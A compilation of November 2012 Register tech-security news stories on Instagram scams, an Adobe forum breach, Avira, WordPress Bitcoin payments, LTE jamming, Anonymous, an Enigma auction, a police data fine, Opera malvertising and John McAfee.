STE WILLIAMS

Scammers are targeting Instagram users by creating fake profiles to gather personal details before attempting to trick users into signing up for premium-rate mobile services, among other ruses.

Fake profiles on the social network often feature “women” with attractive profile pictures who have never posted any photos. Their profile bios include a quote, followed by a shortened URL. These links almost invariably point to advertisements for fake jobs working in social media.

Mobile messages spammed by these fake profiles point to a premium mobile service sign-ups of dubious utility, such as videos of cute animals for only €4.50 per month.

The fake profiles are part of a wider pattern of scams on Instagram, according to Symantec.

“The scams take on a number of forms, from spam comments, to fake followers, to liking photos in the hopes people will check out their profiles, which in turn often contain more spam links,” Paul Wood, a security researcher at Symantec, explains in a blog post.

Instagram’s photo-sharing and social network services were acquired by Facebook in a cash and stock deal eventually valued at $715m at the time it went through in September. The growing popularity of the photo sharing social network, which boasts more than 100m members, means that it is becoming the target of the fake profile scams that have bedevilled Facebook and Twitter for some time.

The latest monthly edition of Symantec’s internet threat report also reports a significant drop in spam volumes during October, with the global spam rate dropping by more than 10 percentage points, from 75 per cent of email traffic in September down to 64.8 per cent in October. The (likely temporary) respite may be down to down to a decline in one prominent spam-spewing zombie network.

“It appears that the Festi botnet has recently gone quiet and could be partly responsible for this sudden decline. This botnet was very active in early September before all but disappearing in October,” according to Symantec’s study (PDF).

Security researchers at the security giant caution that spam volumes might easily increase towards the holiday season as other zombie networks pick up the slack.

“Unfortunately, we’ve seen drops like this before, where other botnets soon jump in to pick up the slack, or a “dead” botnet is reincarnated in a slightly different manifestation. For example, the Kelihos botnet is now believed to be in at least its third incarnation since Microsoft targeted the botnet in the company’s efforts to disrupt the botnet over 12 months ago.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/instagram_scams_up_spam_down/

A breach of Adobe’s Connectusers.com forum database has once again exposed password security foibles, as well as website security shortcomings on Adobe’s part.

Adobe suspended the forum on Tuesday night in response to the hack, as previously reported. The software developer stressed in a statement that its Adobe Connect web conferencing service itself was not affected by the breach.

An Egyptian hacker named “ViruS_HimA” has stepped forward to claim he hacked into “one of Adobe’s servers” before extracting a database containing email addresses, password hashes and other information of over 150,000 Adobe customers, partners and employees.

ViruS_HimA published a limited set of records for users with email addresses ending in adobe.com, .mil and .gov as a means to substantiate his claims on Pastebin.

A statement from Adobe spokeswoman Wiebke Lips appears to back up this claim. Lips said: “The forum has a total of about 150,000 registered users. The attacker leaked 644 records.”

She added: “We reset the passwords of all Connectusers.com forum members and are reaching out to those members with instructions on how to set up new passwords once the forum services are restored.”

In the Pastebin leak post, which has since been pulled, ViruS_HimA said he had targeted Adobe because of shortcomings in its handling of security reports. He promised a leak against Yahoo! would follow.

Analysis of the leak sample by Paul Ducklin, head of technology, Asia Pacific at Sophos, shows that Adobe used MD5, a hashing protocol known to be weak. It also failed to salt password hashes, an extra security precaution that thwarts brute force attacks based on compiling rainbow tables of password hashes from dictionaries of plain text passwords.

Ducklin reports that some of the 644 leaked password hashes corresponded to lame passwords such as “Letmein”, “123456” and “welcome” all multiple entrants on the list. Passwords like breeze and connect (Adobe product names) appear four times each, he adds.

Tal Be’ery, a security researcher at Imperva, said an examination of the leak data suggested it came from a valid but old database.

“We compared some names in the leaked files against Linkedin.com and found out that the names in the file were people who had worked for Adobe but no longer employed there. This suggests that this list is valid [but] the hacked database is probably pretty old.” Password hashes were not salted to guard against brute force cracking attacks, Be’ery adds.

“Based on an analysis of the leaked data, the password hashes – encrypted versions of the passwords – stored in the compromised Adobe database had been generated with MD5, a cryptographic hash function that’s known to be insecure. This means that they can easily be cracked to recover the original passwords,” he concludes. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/adobe_forum_breach/

Avira has rolled out a patch that makes its popular freebie anti-virus software more compatible with Windows 8.

Earlier this month the German firm admitted its products were not yet compatible with Windows 8 after users complained that attempting to run Avira’s software on Microsoft’s latest operating system results in the infamous Blue Screen of Death.

Avira said its security technology didn’t play well with Windows Server 2012 because of a radical redesign in Microsoft’s underlying operating system technology.

Travis Witteveen, chief operating officer of Avira, told El Reg that Avira hoped to have compatible products within weeks. He admitted that it was possible that Avira would lose market share to freebie anti-virus competitors, such as AVG, in the meantime.

Software patches released by Avira on Tuesday ought to resolve the BSOD (stability) problems but users might still be confronted with a pop-up that warns that the software is not officially supported by the security firm. Sorin Mustaca, product manager at Avira, said that the security firm plans to release further software updates to iron out remaining problems. “We are working very hard to get our products Windows 8 compatible as soon as possible,” he said.

A blog post by Mustaca goes some why to explaining why achieving compatibility between security products and Windows 8 is a challenge without providing much insight into why the German firm didn’t see this problem coming months ago. There have been three preview/beta builds of Windows 8 since September 2011, but Avira’s failure to get products ready in time suggests it didn’t put enough resources into developing and testing its technology against the operating system until much too late.

“The Windows 8 operating system, and its equivalent in the server area called Windows Server 2012, have a completely new architecture,” Mustaca explains. “Their architecture forces the software which runs on them to make significant changes in the frameworks and the APIs (Application Programming Interface) used to write the software. Old frameworks (eg, Layered Service Providers, Transport Driver Interface, etc) will no longer be supported on the long term.

“As with any new computer operating system, it is possible that at the beginning some existing software is not compatible with it. Currently, the Avira products are not yet certified for Windows 8 and Windows Server 2012 and there were some problems reported by our users who have upgraded to this operating system.”

Independent testing lab AV-Test.org reports that the vast majority of anti-virus vendors in the market already offer Windows 8-compatible products to consumers. But Reg reader feedback from our previous story on Avira’s Win 8 woes suggests that it’s not always plain sailing even with products listed as compatible with Windows 8. Nonetheless the absence of Avira from the list remains noticeable. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/avira_patches_win8_crash/

Automattic, the company behind blogging platform WordPress.com ,has decided it will accept payment for some services through Bitcoin, the controversial open source currency.

WordPress is proudly free, but Automattic offers some paid services like custom design. Those services, code wrangler Amdy Skelton says in a blog post, aren’t available to everyone because of “because of limits on traditional payment networks” such as the fact that “PayPal alone blocks access from over 60 countries, and many credit card companies have similar restrictions.”

“Whatever the reason, we don’t think an individual blogger from Haiti, Ethiopia, or Kenya should have diminished access to the blogosphere because of payment issues they can’t control,” Skelton adds.

Bitpay.com is Automattic’s bit bank of choice.

Intriguingly, the company will offer Bitcoin payments without waiting for ‘confirmations’, a method Bitcoin uses to verify transactions that relies on other participants in the Bitcoin network recording the transaction and passing news of it to other participants. Many services insist on multiple confirmations before allowing a transaction, but as Skelton’s post notes that takes time and makes for a less-than-satisfying experience.

“Making you wait for confirmations would virtually eliminate our risk,” Skelton writes, “but we’re confident that with digital products like ours the risk is already acceptably low.” That’s presumably because if a transaction goes sour, Automattic can simply tick the box to withdraw the upgrade that it has been ‘paid’ for.

Automattic will also work around another Bitcoin feature, namely its dislike of issuing refunds.

“If a refund is granted on a purchase made with BTC we will work with BitPay to issue a refund in BTC,” Skelton writes. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/wordpress_to_accept_bitcoin/

A class of attack against radio networks documented as far back as the year 2000 has pulled worldwide headlines by being highlighted in a submission to the US government.

The submission, here, has gained notoriety all over the world, starting with Technology Review which headlined it “One simple trick could disable a city’s 4G phone network”.

The paper, to an inquiry into the use of LTE in public safety networks, outlines denial-of-service attacks. These include a technique that sends fake synchronisation signals to handsets within range (thereby stopping them from logging into the base station), or generating signals to the base station that make it assign resources to the jammer rather than “real” users.

The paper describes the Virginia Tech work, headed by Dr Jeffrey Reed, as a “work in progress”, but the idea that an entire city’s network could be disabled by a suitcase-sized jammer is, in these paranoid days, to good to resist.

Since it didn’t seem feasible that the submission existed without reference to previous research, The Register decided to seek out the background.

On thing becomes clear, very rapidly: if carriers, vendors and standards-setters are not aware of the feasibility of synchronisation attacks, they’ve been asleep at the wheel since at least the year 2000, when this paper was published. Authored by Mika Ståhlberg of Helsinki University of Technology, it focuses on the radio standards of the day, such as GSM, noting: “Jamming can be concentrated on the synchronization signal, cutting effectively the entire transmission.”

Virginia Tech’s prior publications – which probably form the basis of the submission, at least in part – include “Physical Layer Security Challenges of DSA-Enabled TD-LTE” here, and from earlier this year, “Efficient Jamming Attacks on MIMO Channels”, here and “Performance of Pilot Jamming on MIMO Channels with Imperfect Synchronization”, here.

The last two were presentations at the IEEE’s ICC 2012 conference, but seem to have escaped everybody’s notice at the time. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/tech_review_sucker_punches_lazypress/

Hackers operating for Anonymous have been launching DDoS attacks and defacing websites to demonstrate their displeasure at Israel’s recent military action in the Gaza Strip, which is currently in its second day.

According to its Twitter feed, the group claims to have taken down or defaced over 40 government and military websites in three hours on Thursday morning, and it has warned of more attacks to come in what it’s calling #OpIsrael. The group said it had been provoked by Israel’s “insane attack” and by threats that the army would cut off internet communications with Gaza.

“When the government of Israel publicly threatened to sever all internet and other telecommunications into and out of Gaza they crossed a line in the sand,” the group said on Twitter. “As the former dictator of Egypt Mubarack learned the hard way – we are ANONYMOUS and NO ONE shuts down the Internet on our watch.”

So far the Israeli Defense Forces (IDF) don’t exactly seem to be quaking in their boots but some minor sites have been defaced with messages supporting the Palestinians. The hackers also issued a copy of the traditional video threat:

The group also released information packs in English and Arabic containing tips and contacts for the residents of Gaza to use in the event of communications going down. So far there has been no official word of any Israeli internet blockade plans, however, and the website for the Palestinian Telecommunication Group is still working as The Reg goes to press.

These kind of Anonymous operations usually last a few days and then fade away, but this time the hackers and DDoS attackers may have bitten off more than they can chew. The IDF is probably the best in the business when it comes to online security (behind the NSA) and if this is the usual script kiddies using duff tools, they could find themselves fingered very quickly. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/anonymous_attacks_israel/

A rare German WWII Enigma cipher machine has beat its auction estimate in London, selling for £85,250.

Bonhams auctioneers had put a £40,000 to £60,000 estimate on the pristine 1941 oak model coding device, used by the Nazis to encrypt and decode messages sent between the military and their commanders.

“Enigma machines come up very rarely at auction. This particular example is in working order, completely untouched and unrestored,” Laurence Fisher, specialist head of mechanical music, technical apparatus and scientific instruments, said before the auction.

“Many machines were picked up by the Allies as souvenirs during the final stages of the second World War and as such, in later years, tended to be ‘mixed and matched’, where rotors, outer cases and head blocks were replaced with another machines’ parts.

“This one has all elements bearing the same serial number, making this totally complete and original throughout.”

The version of the machine sold was a model used between 1938 and 1944, with three-rotors to create 17,576 possible combinations for each letter in a message. The code was unbreakable until code-breakers at Bletchley Park automated the decryption with the Turing Bombe machine. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/15/enigma_machine_auction_price/

A six-figure fine levelled against police for losing a USB stick of drug probe suspects’ details should be spent on training cops to take better care of sensitive data. That’s the view of a candidate standing in today’s police commissioner election in Greater Manchester.

Last month the county’s police force was fined £120,000 after the unencrypted drive was nicked from an officer’s home. The device contained information on more than 1,000 people linked to serious crime. The money has been paid by Greater Manchester Police (GMP) to the Treasury.

Matt Gallagher, a Liberal Democrat candidate for the Police and Crime Commissioner for Greater Manchester, wants the cash reimbursed to allow GMP to spend it on ISO27001 accreditation, training and security products. Gallagher also wants reassurances from top cops that there is no danger of data falling into the wrong hands.

“I would also appeal to the Information Commissioner to use his discretion and require GMP to invest some of this massive fine in assisting the force to provide security training and technical measures to ensure this incident isn’t repeated, including ISO27001 information security compliance and endpoint control,” he said.

“This is public money, it should be used as usefully as possible.”

Gallagher, a former police inspector, is standing for election against Tony Lloyd, a former Labour Party MP and three other candidates: Conservative Michael Winstanley; Steven Woolfe of the UK Independence Party; and Roy Warren, an independent, are also vying for election in Manchester.

Elections for US-style police commissioners are taking place across England and Wales today. There’s are widespread concerns of low voter turnout and criticism of the election process: political hacks with large central party campaign machines are canvassing against independent candidates.

The role will replace the police authority panels – historically made up of elected councillors – currently in charge of 41 forces in England and Wales. The Mayor of London is already tasked with a similar overseeing role in London, so elections will not take place in the capital. ®

Bootnote

Thanks to Reg reader Dave Page for the tipoff.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/15/invest_data_breach_fine_gmp_security_training/

Opera has suspended ad-serving on its portal as a precaution while it investigates reports that surfers were being exposed to malware simply by visiting the Norwegian browser firm’s home page.

Malicious scripts loaded by portal.opera.com were redirecting users towards a malicious site hosting the notorious BlackHole exploit kit, said a Romanian anti-virus firm BitDefender, which said it had detected the apparent attack on its automated systems. BitDefender said it promptly warned Opera after it detected the problem on Wednesday. It seems likely the scripts had been loaded through a third-party advertisement, a practice commonly known as malvertising.

Opera has yet to confirm the problem, but has disabled advertising scripts on its portal in case they are tainted. The browser firm says:

We are investigating the claim, and while we are working with this, we have taken some precautionary measures just to be safe, such as disabling the ads temporarily on portal.opera.com. We disabled ads yesterday [Wednesday], right after becoming aware of the claim, as a standard precaution and the ads had been disabled for several hours when Bitdefender issued a press release.

A blog post by BitDefender claimed that cybercrooks were using obfuscated script to hide the attack. The security firm said Opera fans had been exposed to attack simply by firing up the popular alternative browser software.

“The hidden and obfuscated piece of code in the Opera Portal homepage inserts an iFrame that loads malicious content from an external source,” BitDefender explains. “If the Opera user hasn’t changed their default homepage, active malicious content is loaded from a third-party website whenever they open their browser.”

In controlled tests, BitDefender researchers were served with a PDF-based exploit designed to infect an unlucky user with a freshly compiled variant of the infamous ZBot (ZeuS) banking Trojan. The exploit was served up from a (likely compromised) server in Russia, according to BitDefender. It’s unclear how many people might have been exposed to this drive-by-download-style attack from Opera’s portal, much less how many surfers might have been infected.

“We have no indications that anyone was infected before or after we disabled the ads yesterday [Wednesday],” an Opera spokesman told El Reg.

“Malvertising” incidents are far from rare. Previous victims have included Spotify, the London Stock Exchange, The Pirate Bay, ITV.com and Major League Baseball, among many others. Diagnosing and resolving tainted ad problems tends to be far trickier than cases where a web server itself is running malicious script, so Opera is wise to suspend ad-serving while it looks into the potential problem. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/15/opera_blackhole/

Belize Prime Minister Dean Barrow has called the founder of McAfee antivirus software “bonkers” and “extremely paranoid”, wading into discussion over internet guru’s decision to first hide in the sand and then go on the run from the police in the Central American country.

“I don’t want to be unkind,” said the PM in remarks reported by Reuters, “but he seems extremely paranoid – I would go so far as to say bonkers. He ought to man up and respect our laws and go in and talk to the police.”

Belizean police have been trying to question John McAfee after his neighbour Gregory Faull, 52, a fellow American expat, was found dead from a gunshot wound to the back of his head. A recent report says that the police are not considering him a suspect.

After hearing the police arrive, McAfee’s first course of action was to hide in a cardboard box in the sand, something he described as “extremely uncomfortable” but considered necessary because he feared the police would try to kill or torture him. He is currently still on the run, though has been giving interviews to Wired magazine describing how he has been hiding in boats, taxis and sleeping in lice-infested beds. McAfee also described how he had dyed his hair, eyebrows and moustache black:

“I have modified my appearance in a radical fashion,” McAfee told the mag. “I’ll probably look like a murderer, unfortunately.”

John McAfee mentioned the Belizean prime minister’s personal dislike of him as one of his motives for going on the run from the police, adding that Belizean police were out to get him: “They’ve been trying to get me for months. They want to silence me. I am not well liked by the prime minister.”

PM Barrow says that this is “nonsense” and that he has never met the cybersecurity guru. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/15/john_mcafee_belize_pm/